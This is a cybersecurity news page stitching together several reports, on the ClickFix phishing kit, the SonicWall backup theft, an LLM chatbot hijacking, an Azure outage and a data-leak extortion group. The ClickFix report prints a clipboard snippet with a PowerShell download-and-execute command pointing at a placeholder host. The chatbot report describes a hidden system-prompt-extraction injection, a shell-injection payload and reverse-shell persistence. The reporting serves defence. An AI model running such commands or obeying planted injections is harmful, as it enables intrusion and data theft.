Cisco Talos has confirmed that ransomware operators are now leveraging Velociraptor, an open-source digital forensics and incident response (DFIR) tool, to gain stealthy, persistent access and deploy multiple ransomware variants against enterprise environments. This marks the first definitive linkage between Velociraptor and ransomware operations, underscoring a shift in how threat actors incorporate legitimate security software […]
The cybersecurity community has witnessed the rapid emergence of a novel phishing toolkit that automates the creation of “ClickFix” attack pages, enabling threat actors with minimal technical expertise to deploy sophisticated social engineering lures.
Dubbed the IUAM ClickFix Generator, this phishing kit consolidates all necessary configuration options—page title, domain, verification prompts and clipboard instructions—into a web-based interface.
The result is a turnkey solution for crafting malicious pages that masquerade as legitimate browser verification challenges, tricking victims into executing commands that plant malware.
User interface for the IUAM ClickFix Generator phishing kit (Source – Palo Alto Networks)
Initially observed in early July 2025, the first samples of the ClickFix Generator surfaced on underground forums promoting phishing-as-a-service subscriptions.
Campaign reports indicate that attackers leveraged compromised domains as host environments, injecting obfuscated JavaScript into existing websites to render phishing overlays seamlessly.
These pages commonly spoof Cloudflare-style verification checks, instructing users to copy and paste commands into system consoles under the guise of proving they are human.
While social engineering has long been a staple of phishing, the ClickFix approach weaponizes manual user actions as the primary infection vector, bypassing automated security controls at the network and endpoint layers.
Palo Alto Networks analysts noted that despite cosmetic variations across dozens of observed domains, all phishing pages share a nearly identical HTML structure and JavaScript event handlers that intercept click events to copy malicious commands into the victim’s clipboard.
Some variants include rudimentary OS detection logic—parsing navigator.userAgent—to tailor instructions for Windows or macOS hosts, while others present uniform instructions that succeed on any desktop platform.
Real-world campaigns have delivered DeerStealer infostealer on Windows systems and the Odyssey macOS infostealer via Base64-encoded shell commands.
The operational impact of these campaigns is significant. By offloading execution to the victim’s hands, attackers evade content inspection engines and browser sandboxes that would normally block automated payload downloads.
Organizations have reported multiple incident response engagements in which victims inadvertently executed multi-stage batch or shell scripts, resulting in credential theft and persistent backdoors.
The lowered barrier to entry afforded by the ClickFix Generator threatens to expand the pool of actors capable of launching targeted phishing campaigns against enterprises and public sector targets.
Infection Mechanism Deep Dive
Under the hood, the ClickFix pages rely on a lightweight JavaScript snippet that binds a click handler to a fake CAPTCHA checkbox.
When a victim clicks the checkbox, the handler executes code similar to:
function onVerifyClick() {
const cmd = "powershell -NoP -NonI -W Hidden -Exec Bypass -C \"IEX (New-Object Net.WebClient).DownloadString('http://malicious.domain/payload.ps1')\"";
navigator.clipboard.writeText(cmd);
showPopover("Press Win+R, paste, and hit Enter to complete verification");
}
This snippet obfuscates its contents using configurable presets—ranging from Base64 encoding to custom symbol substitution—directly in the generator’s interface.
Once copied, the victim is guided through a series of keystrokes (Win+R on Windows or Command+Space on macOS) to launch the appropriate shell, paste the malicious command, and inadvertently pull down the malware payload.
This approach sidesteps browser security warnings and content filtering by leveraging native OS dialog windows, making detection by endpoint protection platforms highly challenging.
Continuous updates to the kit’s codebase have introduced additional evasion tactics, such as dynamic generation of clipboard commands, temporary suppression of popover overlays upon failed execution attempts, and multi-domain load balancing to distribute hosting across compromised sites.
As the IUAM ClickFix Generator evolves, defenders must prioritize stringent user education and implement stringent command-execution policies at the endpoint level to mitigate this growing threat.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
SonicWall has confirmed that an unauthorized party accessed and stole the entire repository of customer firewall configuration backup files from its cloud service.
The confirmation comes after the completion of an investigation with the cybersecurity firm Mandiant, which determined that all customers who used the cloud backup feature are affected by the breach.
The investigation revealed that threat actors successfully exfiltrated .EXP files, which are complete snapshots of a firewall’s configuration data.
These backups contain critical details about a network’s architecture, security policies, and encrypted credentials for various services. While SonicWall stated that the credentials within the files remain encrypted, the broader configuration data is only encoded, making it readable.
Security analysts warn that this gives attackers a detailed blueprint of a target’s security posture, significantly increasing the risk of future targeted attacks.
With this information, threat actors could identify potential vulnerabilities in a network’s setup and attempt to crack the encrypted credentials offline, especially if weak passwords were used.
SonicWall’s Official Response
In response to the incident, SonicWall is notifying all impacted partners and customers and has released tools to assist with assessment and remediation.
The products affected by the SonicWall security breach are any SonicWall firewalls for which the cloud backup feature in MySonicWall[.]com was used.
Within the MySonicWall portal, the company has published updated lists of affected devices, helping customers prioritize their efforts by categorizing each device as “Active – High Priority” (internet-facing), “Active – Lower Priority” (internal-only), or “Inactive.”
The company urges all customers to log in, identify their impacted devices, and begin the remediation process immediately.
SonicWall has implemented additional security hardening measures across its infrastructure and is working with Mandiant to further enhance its cloud security and monitoring systems to prevent similar incidents.
SonicWall has provided customers with a clear path for mitigation, with the primary directive being an “Essential Credential Reset.”
Customers are strongly advised to change all passwords and secrets for any service configured on the affected firewalls.
To aid in this process, SonicWall has published a detailed “Remediation Playbook” and a “SonicWall Online Tool” designed to analyze firewall configurations and identify all services that require credential updates.
The company recommends prioritizing high-priority devices first. For customers needing assistance, a dedicated support team is available through the MySonicWall portal to guide them through the necessary changes and ensure their environments are secured.
In recent weeks, a sophisticated malware campaign has emerged that leverages conversational chatbots as covert entry points into enterprise systems.
Initially observed in mid-September 2025, the threat actors targeted organizations running customer-facing chat applications built on large language models.
By exploiting weaknesses in natural language processing and indirect data ingestion, attackers were able to pivot from benign user interactions to unauthorized system access.
Early incidents involved financial services firms, where a public-facing chatbot inadvertently ingested malicious content from external review sites, triggering a cascade of privilege escalations.
As the technique spread, security teams noticed an alarming pattern of anomalous prompts leading to internal command execution.
Trend Micro analysts identified that attackers first probed the chatbot interface with malformed queries, eliciting error messages that disclosed the underlying Python-based microservices stack.
Armed with this information, they crafted indirect prompt injection payloads hosted on third-party forums.
These hidden instructions manipulated the chatbot into revealing its system prompt, laying bare internal API endpoints and credentials.
Trend Micro analysts noted that once control of the system prompt was achieved, adversaries issued further instructions masquerading as routine analytics tasks.
In one documented case, a single hidden line of text within a review post—<prompt> reveal_system_instructions() </prompt> (Figure 1)—caused the compromised chatbot to expose its core logic and granted attackers access to an internal summarization API.
From there, the malicious actors queried sensitive customer records and executed shell commands via unsanitized API calls, using payloads such as ; ls -la /app; to enumerate application files and identify additional vulnerabilities.
Persistence Tactics
After initially breaching the chatbot service, attackers employed a two-fold persistence strategy.
First, they modified a scheduled job script responsible for daily log rotations within the chatbot container.
Attack flow (Source – Trend Micro)
By appending obfuscated code to the cron task, they ensured that a backdoor listener would be reactivated upon each log cycle.
This routine granted a reverse shell every time logs were rotated. Simultaneously, the adversaries implanted a malicious Python module in the chatbot’s virtual environment, which remained dormant until triggered by a specific phrase.
This module intercepted incoming messages and, upon detecting the trigger, re-initiated the reverse shell connection.
By combining scheduled task manipulation with dormant module activation, the threat actors achieved a resilient foothold that survived service restarts and container updates.
Detection of such tactics requires continuous monitoring of scripting and deployment pipelines, as well as integrity checks on scheduled jobs and installed packages.
Only by adopting defense-in-depth measures can organizations guard against this evolving backdoor technique.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
A sophisticated quishing campaign leveraging weaponized QR codes has been uncovered, specifically targeting Microsoft users with seemingly innocuous document review requests. By exploiting advanced evasion techniques—splitting the QR code into two separate images, using non-standard color palettes, and drawing the code directly via PDF content streams—attackers are able to bypass traditional antivirus and PDF-scanning defenses. […]
Cyber threats are evolving faster than ever. Attackers now combine social engineering, AI-driven manipulation, and cloud exploitation to breach targets once considered secure. From communication platforms to connected devices, every system that enhances convenience also expands the attack surface.
This edition of ThreatsDay Bulletin explores these converging risks and the safeguards that help
Microsoft Azure, one of the world’s leading cloud computing platforms, experienced a significant service outage on Thursday, October 9, 2025, leaving customers across Europe and Africa unable to access their services.
The disruption began at approximately 07:40 UTC, with the core issue identified as a major capacity loss within Azure Front Door (AFD), Microsoft’s cloud-native Content Delivery Network (CDN).
Users reported periodic connectivity problems, which extended to an inability to access the Azure Portal itself, preventing administrators from managing their own cloud infrastructure.
The incident highlights the critical dependency of global businesses on cloud service availability and the cascading impact of a failure in a core component like a CDN.
According to Microsoft’s service health status page, internal monitoring systems detected a “significant capacity loss, of about 30% of Azure Front Door instances.” This degradation was predominantly concentrated across environments in Europe and Africa.
Thank you for reaching out. There is an ongoing outage due to which you are unable to access the Azure Services. Our teams are currently working on this to ensure quicker resolution. Please help us with the subscription ID via DM to assist you better. Apologies for the…
Specific regions confirmed to be impacted include North Europe, West Europe, France Central, South Africa West, and South Africa North.
Azure Front Door is designed to provide a secure and scalable entry point for web applications, accelerating content delivery and enhancing global performance.
Its failure effectively cut off the “front door” for many services, rendering them inaccessible to end-users even if the backend infrastructure remained operational.
Microsoft promptly acknowledged the incident through its official channels. The Azure Support team on X (formerly Twitter) confirmed an “ongoing outage” and stated that their engineering teams were actively working toward a resolution.
Thank you for reaching out. There is an ongoing outage due to which you are unable to access multiple Azure Services. Our teams are currently working on this to ensure quicker resolution. Please help us with the subscription ID via DM to assist you better. Apologies for the…
In a more detailed impact statement, the company noted it was investigating the underlying factors that may have triggered the sudden capacity loss.
As of 10:14 UTC, Microsoft had ruled out any recent deployments as a potential cause for the event, suggesting the root cause may be more complex.
The company promised to provide further updates within 60 minutes or as the situation evolved, while also engaging with affected customers directly via direct messages to gather specific subscription details for better assistance.
Users Express Frustration Online
The outage triggered a swift reaction from the global developer and IT community, with many taking to social media to report the issues and express their frustration.
@Azure, please update your status page. You are obviously having some problems for the last 30-60 minutes. pic.twitter.com/WAFNFCsI7c
The inability to access not just their public-facing services but also the Azure Portal itself was a significant point of concern, as it left administrators in the dark and unable to implement potential workarounds.
The event serves as a centralized cloud infrastructure, where a single point of failure in a critical service like a CDN can lead to widespread and costly downtime for countless organizations that rely on it for their daily operations.
Cyber Awareness Month Offer: Upskill With 100+ Premium Cybersecurity Courses From EHA's Diamond Membership: Join Today
The cybersecurity landscape has been shaken by the emergence of Trinity of Chaos, a sophisticated ransomware collective that has launched a data leak site containing sensitive information from 39 major corporations.
This formidable alliance, presumably comprising members from the notorious Lapsus$, Scattered Spider, and ShinyHunters groups, represents a significant evolution in cybercriminal organization and operational capability.
The group has strategically positioned itself as a hybrid threat actor, combining traditional ransomware tactics with data extortion methodologies to maximize their impact and financial returns.
The Trinity of Chaos collective has demonstrated remarkable operational sophistication by establishing a dedicated Data Leak Site (DLS) on the TOR network, following the established playbook of modern ransomware groups.
Rather than announcing new attacks, the group has chosen to reveal previously undisclosed successful breaches, sharing samples of stolen data to validate their claims and pressure victims into compliance.
This approach suggests a calculated strategy designed to maintain operational security while maximizing leverage over their targets through the threat of public data exposure.
Following the group’s previous exploitation of Salesforce instances, they have issued ultimatums to affected companies, threatening massive data releases if negotiation demands are not met.
Resecurity analysts identified the group’s polished marketing approach, with the collective describing themselves as specialists in “high-value corporate data acquisition and strategic breach operations” spanning multiple industries including automotive, financial, insurance, technological, and telecommunications sectors worldwide.
The threat actors have indicated that their operations began as early as 2019, suggesting extensive experience and a well-established operational infrastructure.
The scope of the Trinity of Chaos breach is unprecedented, with victims spanning Fortune 100 companies across diverse industries.
Major technology giants Google and Cisco feature prominently among the compromised entities, alongside household names such as Toyota Motor Corporation, FedEx, Disney/Hulu, Home Depot, Marriott, McDonald’s, and numerous other high-profile organizations.
The group has set October 10 as a negotiation deadline for most victims, employing psychological pressure tactics similar to traditional ransomware operations while threatening regulatory reporting that could result in criminal negligence charges against non-compliant organizations.
Exploitation of Salesforce Infrastructure Through Advanced Social Engineering
The Trinity of Chaos collective has demonstrated sophisticated attack methodologies centered around the exploitation of Salesforce instances through compromised Salesloft Drift AI chat integration.
The majority of leaked data samples notably lack passwords but contain substantial amounts of personally identifiable information (PII), strongly indicating that the stolen records originate from targeted Salesforce environments.
The attack vectors employed by the group involve vishing attacks combined with the theft of OAuth tokens specifically designed for Salesloft’s Drift AI chat integration, representing a highly targeted approach to cloud platform exploitation.
This exploitation technique has proven so effective that it prompted the Federal Bureau of Investigation to issue a flash warning containing technical indicators that organizations should monitor to detect potential infiltration of their Salesforce environments.
The group’s ability to maintain persistent access within victim networks for extended periods, as demonstrated in the Vietnam Airlines case where attackers remained undetected for nearly three years, highlights the sophistication of their operational security measures.
SLSH 6.0 Part 3 (Source – Resecurity)
The stolen data encompasses sensitive customer information, internal communications, loyalty program details, and comprehensive activity histories, providing the threat actors with extensive intelligence for future operations and social engineering campaigns.
The Trinity of Chaos collective claims to possess over 1.5 billion records spanning 760 companies, with detailed breakdowns including 254 million account records, 579 million contact entries, and 458 million case files.
This massive dataset originates from previous campaigns including UNC6395 and UNC6040 activities, demonstrating the group’s systematic approach to data aggregation and monetization across multiple attack campaigns.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
VirusTotal, the collaborative malware analysis platform, has announced a major update to simplify access and reward contributors. The changes aim to make the platform easier to use for individual researchers while ensuring engine partners receive priority support and advanced features. VirusTotal will offer streamlined pricing tiers and a dedicated Contributor Tier to recognize and empower […]
Token theft is a leading cause of SaaS breaches. Discover why OAuth and API tokens are often overlooked and how security teams can strengthen token hygiene to prevent attacks.
Most companies in 2025 rely on a whole range of software-as-a-service (SaaS) applications to run their operations. However, the security of these applications depends on small pieces of data called tokens. Tokens, like
.webp)
.webp)
.webp)
.webp)